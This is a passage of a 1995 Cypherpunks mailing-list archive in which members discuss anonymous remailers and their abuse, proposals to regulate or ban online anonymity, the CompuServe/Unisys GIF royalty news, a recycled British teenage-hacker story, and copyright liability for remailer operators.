at teleport.com (Enki of Enridu) Date: Wed, 4 Jan 95 14:10:47 PST Subject: Stegno for Kids In-Reply-To: Message-ID: On Tue, 3 Jan 1995, Robert A. Hayden wrote: > On Tue, 3 Jan 1995, Hadmut Danisch wrote: > There was also this thing where you would get these books and a magic > marker, and they you would do puzzles in the book, and use the pen to > develope the answer. > > The old Infocom hint books also used a similiar setup. I remember those. The hints would range in order of how desperate the player was. That was almost as much fun as the game... David Elkins From blancw at microsoft.com Wed Jan 4 14:42:04 1995 From: blancw at microsoft.com (Blanc Weber) Date: Wed, 4 Jan 95 14:42:04 PST Subject: Siegel and Lewis Message-ID: <9501042243.AA25793@netmail2.microsoft.com> Why is it that so many cypherpunks like the economist? I learned recently that Eric is a big fan. So am I. You're certainly not the first other cypherpunk to mention this. Weird. I mean, it's not exactly a radical publication... it just gets its *&#$*#$ facts right. Probably this is it. ................................................... I like it for its classy, stylish prose. And the fact that it presents an economic perspective on world events. .. Blanc From jamesd at netcom.com Wed Jan 4 14:47:32 1995 From: jamesd at netcom.com (James A. Donald) Date: Wed, 4 Jan 95 14:47:32 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: On Wed, 4 Jan 1995, Jonathan Rochkind wrote: > In a rather disjointed sort of way, that makes it easy to beleive the > article was mangled somewhat in editing. Perhaps they rearanged it to put > the "sensational" fear-mongering stuff first. Which is unfortunate, and One of the top points was "experts say ....". Journalists do not quote anonymous "experts" on controversial stuff unless they have marching orders from above. It is a violation of the standard rules of journalism. You are always supposed to identify the person allegedly speaking. "Experts say .." is like "Highly placed sources ...". You know an official lie issued by the the appropriate department of lies is about going to follow when you see those words. This article was no accident of sloppy thinking and editing. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From bshantz at spry.com Wed Jan 4 14:48:48 1995 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 4 Jan 95 14:48:48 PST Subject: The Good Times virus ... Message-ID: <199501042250.OAA01990@homer.spry.com> Hey folks, Remember the AOL Good Times virus? Well, we just got some mail here at SPRY warning us about it. I laughed rather hard. Anyway, I told the guy who sent the mail that I would send him a number of pieces of documentation about the fact its a hoax. There was a NASA newsletter a few months back about it. I deleted it, because I thought I'd never need it again. Does anyone know where I might get a copy of that or another press release about the Goot Times hoax? I'd appreciate any help. Thnax, Brad >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ---------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From cactus at seabsd.hks.net Wed Jan 4 15:07:09 1995 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Wed, 4 Jan 95 15:07:09 PST Subject: Warning letter from Co$. [any comments ?] Message-ID: <199501042312.SAA03816@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- In article <199501042047.PAA06797 at cutter.clas.ufl.edu>, Avi Harris Baumstein wrote: >i know there has been much chatter on this subject, but are there >truly any precedents that could hold on the anonymous distribution of >copyrighted material? are remailer-ops truly in legal danger? what >exactly constitutes a trade secret, and what sort of laws apply? This is oddly timely. The LaMacchia decision showed that providing a service for others to use for the distribution of copyrighted material (in his case, copyrighted software) was not prosecutable under Wire Fraud statutes. The judge told the Feds, "no dice. Stop trying to applying laws to areas where they weren't intended." Civil matters are another matter, of course, but that's one avenue that's closed. - - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwrwjBNhgovrPB7dAQHIYAP6AtRFkIqOj+vRPxUPLdGaUK9t9/pZQi8g 6HyXHBjaEA9ygX8ALQEbS3AK1a1DsqWIsOxXVivszfEY+1lmS3w93VnICjigebbf YuHpFOOgyf8IkUBslov1V7Pw0/X/blMVspyc1nDigK3KsyMi7PalAw5ECECqkhkD AizVLOZNrO0= =yOiL - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwsrTyoZzwIn1bdtAQH9xAF/dFkiStD+csfx4ATJ76WaxrfcLPEYej+p Ec55BXkOYH+96xGLHugficY5hRjtL5eL =LPEW -----END PGP SIGNATURE----- From meconlen at IntNet.net Wed Jan 4 15:17:09 1995 From: meconlen at IntNet.net (Michael Conlen) Date: Wed, 4 Jan 95 15:17:09 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: On Tue, 3 Jan 1995, Jonathan Cooper wrote: > > Martha Siegel is just fucked up enough that she will probably push > > for legislation regulating the nets. Congress is just fucked up that > > they might pass it. > > And if they do I will make it a definate point to do all I can to > emigrate to the UK, the Netherlands, or somewhere else. > > This country is increasingly becoming a police state, and I've got too > many years of life left to just passively deal with it. As I understand it, the government owns a portion of the internet. What they want to regulate about that is their business. What I want to know is how can they regulate what private business and citizen's do with there Fiber Optic's, ISDN lines, telephone lines, and computers. If the government was to ban anything on the net, it would shurly seem to me to be in violation of the first ammenment. Things like pirated software, being illegal already, is one thing, but our mail, conversations, ect. is diffrent. Does anyone have any information on what grouds Seigel and Lewis plan to use for legislation? If they do pass laws regulating the 'net I hope someone comes up with a no-spamming law, then I am getting a ticket on Jon Coopers plane out of the country. Groove on Dude Michael Conlen From db at Tadpole.COM Wed Jan 4 15:21:02 1995 From: db at Tadpole.COM (Doug Barnes) Date: Wed, 4 Jan 95 15:21:02 PST Subject: Remailer Abuse In-Reply-To: Message-ID: <9501042320.AA07624@tadpole.tadpole.com> The problem with a _free_ remailer is obvious -- like many other Internet resources, it can suffer from the tragedy of the commons. Even a negligible fee would do much to prevent gross remailer abuse. It may not be feasible to make remailers in to an industry, but this isn't the point -- it will keep the utterly lame from using it for pranks and their ilk. From anonymous-remailer at shell.portal.com Wed Jan 4 15:24:17 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 4 Jan 95 15:24:17 PST Subject: who? Message-ID: <199501042324.PAA14631@jobe.shell.portal.com> i'm sorry to hear the jpunix remailer is down for good-- why can't people learn to be more fuckin responsible! i guess this is just yet another inconvenience we can tank terrorists for and those aol-holes! anybody know the email address of the good samaritans? tia From bshantz at spry.com Wed Jan 4 15:45:24 1995 From: bshantz at spry.com (bshantz at spry.com) Date: Wed, 4 Jan 95 15:45:24 PST Subject: The Good Times virus ... Message-ID: <199501042346.PAA03355@homer.spry.com> Thanks to the people who've sent me copies of the CIAC announcement. That should cover my needs for right now. Hopefully I can convince these people not to worry. -- brad From pstemari at erinet.com Wed Jan 4 16:11:42 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Wed, 4 Jan 95 16:11:42 PST Subject: British Hacker Article Message-ID: <9501042343.AB19355@eri.erinet.com> At 01:31 PM 1/4/95 -0500, Duncan Frissell wrote: >>From The Independent (London) Tuesday 3 January 1995 - Front Page > ... The US Defence Information >Systems Agency admitted in a private briefing, which has been confirmed, >that the hackers had affected the Department's "military readiness." "Admitted"? Probably "complained without substaniation" would be more accurate. > ... It is understood that >he invented a "sniffer" programme which searched across hundreds of >computers attached to the Internet for passwords and user names. ... If he was really behind the various password sniffers running on Netcom, etc, he has a lot of explaining to do. > ... "They contained information about >firing sites in North Korea and stuff like that. Field intelligence. He >kept detailed logs of communication traffic. ... The Korean files were on >the Girths Air Force Base computer system and therefore the could have been >accessed. ... Harumpf. Either the stuff wasn't classified, or else someone had a major security procedures breach and had classified material sitting on a computer with an uncrypted comm link. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From entropy at IntNet.net Wed Jan 4 16:21:19 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 4 Jan 95 16:21:19 PST Subject: San Francisco Editorial In-Reply-To: Message-ID: > A letter to the editor is like spitting into the wind in this case. I > think what's needed is a more constructive affirmative action, ideally > taking Cantor and Siegel to court somewhere. Perhaps it's my libertarian outlook, perhaps not, but I tend to abhor using the US government's ``legal'' system for almost any reason. The worst thing about doing this (suing them), IMHO, is that if you lost you would create a precedent for all the people who aren't doing it because they might consider it illegal or immoral -- far too many people consider things that the court okays to be morally okay. Instead, I think it's a great stimulus for better software - there's no reason to sue them when it'd be a better thing for the community if newsreaders and mailreaders were enhanced to deal with spams. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Wed Jan 4 16:27:25 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 4 Jan 95 16:27:25 PST Subject: Regulatory Risks In-Reply-To: Message-ID: > Criminalize anonymity, and tell the internet providers to figure > out how to enforce it or face confiscation. Which would probably amount to sniffing all packet traffic. If that ban was implemented, so would ways around it be implemented. I would prefer that they not need to be invented but if they must be, they will be. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Wed Jan 4 16:29:09 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 4 Jan 95 16:29:09 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: > I tend to focus on the subject matter economist prints. I just find it > more on target than most if not all of the major U.S. media sources. I find _Reason_ quite excellent as well. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Wed Jan 4 16:37:41 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 4 Jan 95 16:37:41 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: > As I understand it, the government owns a portion of the internet. What Yes. And through my work's upcoming link, so will they. So what? > they want to regulate about that is their business. What I want to know On their own networks, surely. > is how can they regulate what private business and citizen's do with > there Fiber Optic's, ISDN lines, telephone lines, and computers. If the They already do - look at the regulations on telcos, power companies, water companies, cellular/paging companies, lawyers, doctors, etc. > government was to ban anything on the net, it would shurly seem to me to > be in violation of the first ammenment. Things like pirated software, An interesting point. Any legal views from someone more versed in the law than I? -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Wed Jan 4 16:40:13 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 4 Jan 95 16:40:13 PST Subject: Remailer Abuse In-Reply-To: <9501042320.AA07624@tadpole.tadpole.com> Message-ID: > The problem with a _free_ remailer is obvious -- like many > other Internet resources, it can suffer from the tragedy of > the commons. See the remailer at c2.org as an example - quite nice, and has a pay-for-more than n bandwidth agreement. Works fine for a few small chatty messages, won't work worth a damn for spamming. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From an172607 at anon.penet.fi Wed Jan 4 17:24:22 1995 From: an172607 at anon.penet.fi (duquesne duke) Date: Wed, 4 Jan 95 17:24:22 PST Subject: gif format in newsbytes Message-ID: <9501050029.AA25564@anon.penet.fi> CompuServe GIF License & Royalties Raises Hackles COLUMBUS, OHIO, U.S.A., 1995 JAN 4 (NB) -- On-line giant CompuServe has sparked controversy on the Internet by offering a $1-plus-royalties license for developers to use its previously free GIF (Graphics Interchange Format) image file format. CompuServe terms the fee an offer and a benefit to the on- line community, but skeptics quickly dubbed it a "GIF tax." The new fee system is based on a licensing agreement reached between CompuServe and Unisys Corp. (NYSE:UIS) in June, 1994, for use of LZW (Lempel- Zev-Welch) compression in its GIF format. Unisys has claimed a patent on LZW technology. Under the CompuServe agreement, developers who wish to operate under the on- line firm's LZW license agreement with Unisys pay a one-time fee of $1 plus a royalty of 1.5 percent or 15 cents per registered program, whichever is greater. Downloaded programs that do not get registered are not subject to the fee, nor are end-users. CompuServe announced the new fee system in various areas or "forums" of the service on December 29. The timing has led to suspicions by some that the service was not being fully honest with its members. In an open letter, Pat Clawson, president and chief executive officer (CEO) of TeleGrafix Communications Inc., called it "the online communications community's equivalent of the sneak attack at Pearl Harbor," and added: "The announcement of the CompuServe-Unisys GIF Tax on December 29, during the lull between Christmas and New Year's Day, was clearly timed to cause maximum damage while an unsuspecting public celebrated the holidays." Clawson said his firm, which developed the RIPscrip 2.0 online multimedia technology and the RIPTERM terminal program that leans heavily on the JPEG (Joint Photographic Experts Group) image format, will drop support of GIF images because of the new fee system. RIPscrip 2.0 is scheduled for release January 16. Speaking to Newsbytes, CompuServe spokesman Pierce Reid acknowledged that the release date may have been unfortunate from a public relations viewpoint, but he said it was an accident of timing, not a desire to avoid public scrutiny. Reid pointed out that it took a year and a half to hammer out a licensing agreement with Unisys Corp. (NYSE:UIS). Unisys holds a patent on the GIF format's underlying LZW compression technology. Once the agreement with Unisys was signed in June, 1994, he added, it took CompuServe another six months to arrive at a way to, as he put it, "share" the license. "Six months is not a long time to settle the details of a licensing agreement, if you know how these things work," he told Newsbytes. "We're not making any money on this. We paid a substantial fee to Unisys for the license, and we offered to share the license for the benefit of the development community as well as for ourselves and our subscribers." Reid said the license was based on the fact that CompuServe had found merit in a Unisys patent claim. CompuServe had used the patented LZW technology in its 1987 development of the GIF format, believing the technology to be in the public domain. Unisys contacted the on-line firm about its patent claim in 1993, and that eventually led to the December 29 announcement, the firm said. Commented Reid: "I've been watching the Internet, and those who are commenting are on a bell curve -- the vast majority are taking a reasonable view, but there are always those out on the extreme ends. "A number of people regard this as a real benefit. CompuServe, by requiring no money for negotiations, is saving developers from the need to waste time. There's no worrying about legal or licensing issues, and we've done that for a dollar." (Craig Menefee/19950104/Press Contact: Pierce Reid, CompuServe, 614-538-4571; Pat Clawson, TeleGrafix, 714-379-2140, Internet e-mail rip.support at telegrafix.com; Oliver Picher, Unisys, 215-986-5367) Unisys Seeks Royalties On GIF Algorithm BLUE BELL, PENNSYLVANIA, U.S.A., 1995 JAN 4 (NB) -- Unisys Corp. (NYSE:UIS) said it will seek royalty payments from developers of software using the Graphic Interchange Format (GIF). Unisys said it owns rights to an algorithm that is widely used in GIF tools. Oliver Picher, a spokesman for Unisys, told Newsbytes that the online service CompuServe introduced the GIF format in 1987, and incorporated the Unisys algorithm, apparently believing it was in the public domain. Unisys learned that the algorithm was used in the GIF technology about two years ago, contacted CompuServe, and in June, 1994, the companies reached an agreement under which CompuServe paid Unisys an undisclosed sum for use of the algorithm. The payment was "a reasonable amount but not an overwhelming amount," Picher said, declining to reveal the exact sum. CompuServe was the first to license the algorithm from Unisys for use in a GIF tool, Picher said, but about 100 companies have licensed it for other purposes. Picher said one other online information service has already licensed the algorithm, but could not say if it was for GIF-related use in that case. Unisys is negotiating with all the major online services for possible license agreements, Picher said. While he would not give specifics, he said the terms Unisys is seeking are "very reasonable to the point where license fees shouldn't be a barrier" to using GIF. He added that people who have GIF software on their PCs will not be affected. The same algorithm is also used in the Tagged Image File Format (TIFF) graphics format, and Unisys concluded a license agreement with Aldus Corp. some time ago, Picher said. (Grant Buckler/19950104/Press Contact: Oliver Picher, Unisys, 215-986-5367) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From tcmay at netcom.com Wed Jan 4 17:30:07 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 4 Jan 95 17:30:07 PST Subject: Outlawing Anonymity In-Reply-To: Message-ID: <199501050126.RAA01575@netcom12.netcom.com> Jonathan Cooper wrote: > > > Criminalize anonymity, and tell the internet providers to figure > > out how to enforce it or face confiscation. > > Which would probably amount to sniffing all packet traffic. > > If that ban was implemented, so would ways around it be implemented. > I would prefer that they not need to be invented but if they must be, > they will be. This same topic--the outlawing of anonymity and anonymous remailers--is also being debated on the Cyberia list, as many of you know. (Timely, I guess, because of the Siegel comments, the Lewis article, and the Church of Scientology threats.) The ways around such a ban are so patently obvious that any such "ban" is unenforceable. I wrote a piece on this for the Cyberia list, but this was my single most important point: If anonymous mail is outlawed, then the anonymous mailers can attach real names. To wit, all mail from a famous remailing site in the Netherlands could be marked as being from "Hans Brinker." This would presumably meet the letter of the law, if not the "spirit." (I always did hate this "spirit.") Further, sites which "forward" anonymous mail, or mail from "Hans Brinker," are in most cases precluded by the ECPA from screening this mail or otherwise examining it. I see no prospect whatsover that a ban on anonymous mail could be implemented, enforced, or upheld in the courts. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From nelson at crynwr.com Wed Jan 4 17:31:32 1995 From: nelson at crynwr.com (Russell Nelson) Date: Wed, 4 Jan 95 17:31:32 PST Subject: Remailer Abuse In-Reply-To: <9501042320.AA07624@tadpole.tadpole.com> Message-ID: From: db at Tadpole.COM (Doug Barnes) Date: Wed, 4 Jan 1995 16:38:21 -0600 (CST) Cc: cypherpunks at toad.com The problem with a _free_ remailer is obvious -- like many other Internet resources, it can suffer from the tragedy of the commons. Even a negligible fee would do much to prevent gross remailer abuse. It may not be feasible to make remailers in to an industry, but this isn't the point -- it will keep the utterly lame from using it for pranks and their ilk. Use First Virtual. The "information" that you sell is a one-time email alias that points to your remailer. After an hour, that email alias gets disabled. This dynamic setup is easy to do with smail, just a matter of dropping a file into a directory. And who cares if they pay you or not, because if they don't pay (choose to purchase the information), eventually FV will cancel their account. Send mail to info at fv.com. This gets you an automated response. Their contract says that they won't enforce payment on services, so if you offer a service, you're completely at risk, but again, there's not much real risk here... -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From jrochkin at cs.oberlin.edu Wed Jan 4 17:37:07 1995 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Wed, 4 Jan 95 17:37:07 PST Subject: good news about the EFF... Message-ID: At 11:23 PM 01/01/95, Aron Freed wrote: >Has anyone seen Monty Python's Life of Brian..... DO I hear a parallelism??? >Something to the effect of "The PEople's Judean Front", "The Popular >People's Front", and it goes on an on.... > >HOw about for the modern approach.... CDT, EFF, CPSR, Cypherpunks... Do I >hear more.. Or are we so split up that we can't agree on our common goal.... The more the merrier, in my opinion. As long as they can all get funding, which admittedly could be a problem, but presumably if it is then some of the organizations will just drop out. *shrug* But in general, decentralization is good, right? I'd rather have 5 organizations defending electronic rights then just one, when we know all too well how possible it is for that just one to negotiate a compromise that seems more like a betrayal. The more active, funded organizations, the more it appears to legislators like people are really concerned about this stuff, and the safer we are against point-failure. Decentralize, distribute, good. :) [Of course it remains to be seen if so many organizations at once can remain active and well funded.] From nobody at replay.com Wed Jan 4 18:35:29 1995 From: nobody at replay.com (Name withheld on request) Date: Wed, 4 Jan 95 18:35:29 PST Subject: British Hacker Story Message-ID: <199501050236.AA22300@xs1.xs4all.nl> From: newsbytes at clarinet.com (NB-LON) Subject: London Newspaper Runs Old "Superhacker" Story 01/03/95 Date: 3 Jan 95 20:44:22 GMT LONDON, ENGLAND, 1995 JAN 3 (NB) -- As the UK started back to work today after the long Christmas and New Year shutdown, readers of the Independent newspaper were treated to the banner headline "British Boy Raided US Defense Secrets." The curious thing about the story was that none of the other nationalpapers or news wires carried any reports. On investigation, Newsbytes discovered why -- the story dates back to July of last year, and briefly resurfaced in early November on the US news wires. According to the Independent, a 16-year-old British boy has been arrested in connection with a alleged unauthorized intrusions into the US government's computers and "was able to watch secret communications between US agents in North Korea during the crisis over nuclear inspections last spring." The story is quite correct, except that the boy in question was arrested last July, when the original story broke. Commenting on the story, Peter Sommer, a leading security consultant and a senior with the Computer Research Center at the London School of Economics, said that it smacked of the British Telecom secrets case of late November,also reported in the Independent. That story, as reported by Newsbytes, turned out to be something of a non-event when the hacker, who posted details of top secret files on BT's ex-directory computer "across the Internet," turned out to be Steve Fleming, a Scottish freelance journalist who worked as a temp for BT in the summer and broke BT's own security rules by downloading files from the BT's Customer Service System (CSS) computer, then mailed them -- across the Internet -- to other people. "I'm amazed at the Independent running yet another story involving the Internet," Sommer told Newsbytes, adding that it is "a very old story. It seems that all they have to do is to work up a story about a hacking attempt, whether successful or not, and weave in a story about the Internet, and it's a headline story." Ken Young, newly installed editor of Communicate, a leading industry communications magazine in London, and a veteran of the UK communications industry for more than a decade, told Newsbytes that the story seemed a little thin. "It looks like another hacking story except that (the newspaper) has written in something about the Internet, and bingo! You've got a report that the information was accessible to 32 million users on the Internet," he said. Sommer, meanwhile, told Newsbytes that he had made his own discreet inquiries about the story with high level authorities when it broke last summer. "There are two problems with this case. Firstly, any lawyer worth his salt would invoke Section 69 of the Police & Criminal Evidence Act," he said. This Act, Sommer explained, requires that, before a computer can be considered as admissible evidence in court, the owner of the computer must issue a certificate of correct working. This, he said, could not be issued, as a casual user of a PC would be unable to make such a certification. Sommer went on to explain that the second reason that the case could be problematic for the prosecution was "that the lawyer would ask the court for full disclosure of all affected files on victim's host computers," which, since such files are almost certain to be classified in the US, could not be revealed in a British courtroom. The facts surrounding the case, as reported by Newsbytes, were that the 16-year-old -- operating under the code name of Data Stream -- was one of several who gained unauthorized access to the US defense computer network in late 1993 and early 1994 and that some files were deleted. At the time, press reports said that as many as a million passwords were compromised, and may have compromised the military readiness of the United States. The case has, Newsbytes understands, been fully investigated by the US Air Force Office of Special Investigations (OSI) although details of the report of the investigation by the USAF OSI are classified. Originally, the press reports of the time speculated whether the youth would be the first under-18 to be extradited to the US to face charges. It seems that, following last summer's arrest and submission of the report to the Crown Prosecution Service that the case is being quietly shuffled into a file because of the practical problems in pursuing a prosecution. From nelson at crynwr.com Wed Jan 4 19:11:15 1995 From: nelson at crynwr.com (Russell Nelson) Date: Wed, 4 Jan 95 19:11:15 PST Subject: The NYTimes article Message-ID: The New York Times article is on Nando (News and Observer)'s WWW server: http://www.nando.net/newsroom/nt/inf/01029537644.html For those who haven't seen it... -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From s009amf at discover.wright.edu Wed Jan 4 20:30:14 1995 From: s009amf at discover.wright.edu (Aron Freed) Date: Wed, 4 Jan 95 20:30:14 PST Subject: good news about the EFF... In-Reply-To: Message-ID: On Wed, 4 Jan 1995, Jonathan Rochkind wrote: > which admittedly could be a problem, but presumably if it is then some of > the organizations will just drop out. *shrug* But in general, > decentralization is good, right? I'd rather have 5 organizations defending > electronic rights then just one, when we know all too well how possible it > is for that just one to negotiate a compromise that seems more like a > betrayal. The more active, funded organizations, the more it appears to > legislators like people are really concerned about this stuff, and the > safer we are against point-failure. Decentralize, distribute, good. :) > > [Of course it remains to be seen if so many organizations at once can > remain active and well funded.] A good point, but I was just trying to make the point of too many organizations becomes very silly.... But thanks for pointing out the other extereme... | A(a)ron M. Freed | It is naive to believe people are honest. | | s009amf at discover.wright.edu | It is naive to believe programmers are | | (513)276-3817 (voice) | honest. It is even more naive to believe | | (513)276-4158 (data/fax) | the government is honest. Down with Big | | | Brother. | |_____________________________|___________________________________________| From db at Tadpole.COM Wed Jan 4 20:52:46 1995 From: db at Tadpole.COM (Doug Barnes) Date: Wed, 4 Jan 95 20:52:46 PST Subject: Remailer Abuse In-Reply-To: Message-ID: <9501050453.AA10198@tadpole.tadpole.com> > The problem with a _free_ remailer is obvious -- like many > other Internet resources, it can suffer from the tragedy of > the commons. > > Even a negligible fee would do much to prevent gross remailer > abuse. It may not be feasible to make remailers in to an > industry, but this isn't the point -- it will keep the utterly > lame from using it for pranks and their ilk. > > Use First Virtual. The "information" that you sell is a one-time > email alias that points to your remailer. After an hour, that email > alias gets disabled. This dynamic setup is easy to do with smail, > just a matter of dropping a file into a directory. Heh. An anonymous remailer paid for by credit card... there'd have to be an additional level of indirection for it to work, which would make the methods for tracking those who don't pay quite problematic. Also, most remailer abuse tends to be of the hit-and-run variety, which is still nicely enabled by FV. Anonymous remailers pretty much require anonymous digital cash, although this could be built on top of some other electronic payment system with somewhat less payment lag and reversability than FV. Doug From db at Tadpole.COM Wed Jan 4 20:58:12 1995 From: db at Tadpole.COM (Doug Barnes) Date: Wed, 4 Jan 95 20:58:12 PST Subject: Remailer Abuse In-Reply-To: Message-ID: <9501050458.AA10237@tadpole.tadpole.com> > See the remailer at c2.org as an example - quite nice, and has a > pay-for-more than n bandwidth agreement. Works fine for a few small > chatty messages, won't work worth a damn for spamming. > I like both this idea and this particular service. I didn't mean to imply that nobody was charging/reducing spam. From lmccarth at ducie.cs.umass.edu Wed Jan 4 20:58:24 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 4 Jan 95 20:58:24 PST Subject: Anonymous payment scheme Message-ID: <199501050503.AAA07022@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- The Dalai Lama writes: > I know that in Delaware it is illegal for a merchant to request ID when > you pay by credit card. I'm not sure if this is wide spread or just > local. As I recall there was something of a national outcry about this practice several years back. I think California outlawed it at the time, along with other states, though I don't know if any federal law was passed. Since I understand MBNA America is the second-largest employer in Delaware, I'd guess that if Delaware banned it, so did most states. Retail stores often asked one to write one's phone number on the check when paying that way. I remember my father habitually writing the police dept.'s non-emergency number in all such cases :] > -- [Here's something for those friendly mail scanners...] > [...] LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche "quiche" ? The *real* Four Horsemen don't eat quiche ! -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLwt8YWf7YYibNzjpAQF02QP/dTKpXWYIIQmc53X+TqctbvSY3Lv2Rohz GP1Lm1RXkMtmEPfsLgmZOg6J+E7dw6NYlr9rpANLHsy3Hf7lPlMSbVKNJ/b3dO7z 6Cox4ve2hG1WjLaHu8tKbzW1mPWASX+wojyvJhe8dX1wCEdlUkJk7qMk5kSLWqKk K4X8H7MH5Nw= =noOA - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwt9kSoZzwIn1bdtAQFIrgF+OxMRUbtLW4JhKFMxvdNg62v6Lqdb5Bog IRrUySoeo39h5EL9474TY9Gnd4r7debR =iplm -----END PGP SIGNATURE----- From eric at remailer.net Thu Jan 5 00:02:06 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 5 Jan 95 00:02:06 PST Subject: Warning letter from Co$. [any comments ?] In-Reply-To: <199501042047.PAA06797@cutter.clas.ufl.edu> Message-ID: <199501050801.AAA18013@largo.remailer.net> From: Avi Harris Baumstein i know there has been much chatter on this subject, but are there truly any precedents that could hold on the anonymous distribution of copyrighted material? Cubby v. Compuserve is relevant here, as well as that bookstore case in the 50's that I never remember the name of. Mike G., can you help me out on this one? These cases are about other kinds of wrongs (libel in one and obscenity (?) in the other), but copyright violation doesn't seem to be have any particular features to set it apart from the basic principle of these. Namely, if you know, you're responsible; if you don't, you're not. This, you all realize no doubt, is a gross simplification of a long chain of reasoning. what exactly constitutes a trade secret, and what sort of laws apply? The short answer is that if you didn't sign a trade secret agreement or are party to one by some other relationship (such as agency), then a trade secret that comes your way is no secret any more. > clients' property rights. Courts are holding such > contributory infringers liable. Two examples are: Sega > Enterprises Ltd. v. Maphia BBS, 30 U.S.P.Q. 2d 1921 (N.D. > Cal. 1994) and Playboy Enterprises v. Frena, 839 F. Supp. > 1152 (M.D. Fla. 1993). what of these cases? is this just an example of typical lawyerly intimidation tactics? I have personal experience with the first case. It was a local BBS run by a friend of a friend, and I got involved a year ago right after the seizure. (It was, BTW, a _civil_ seizure of a BBS, not criminal.) I believe the case settled out of court. There were court documents approving the seizure however; I don't know if these set precedent or 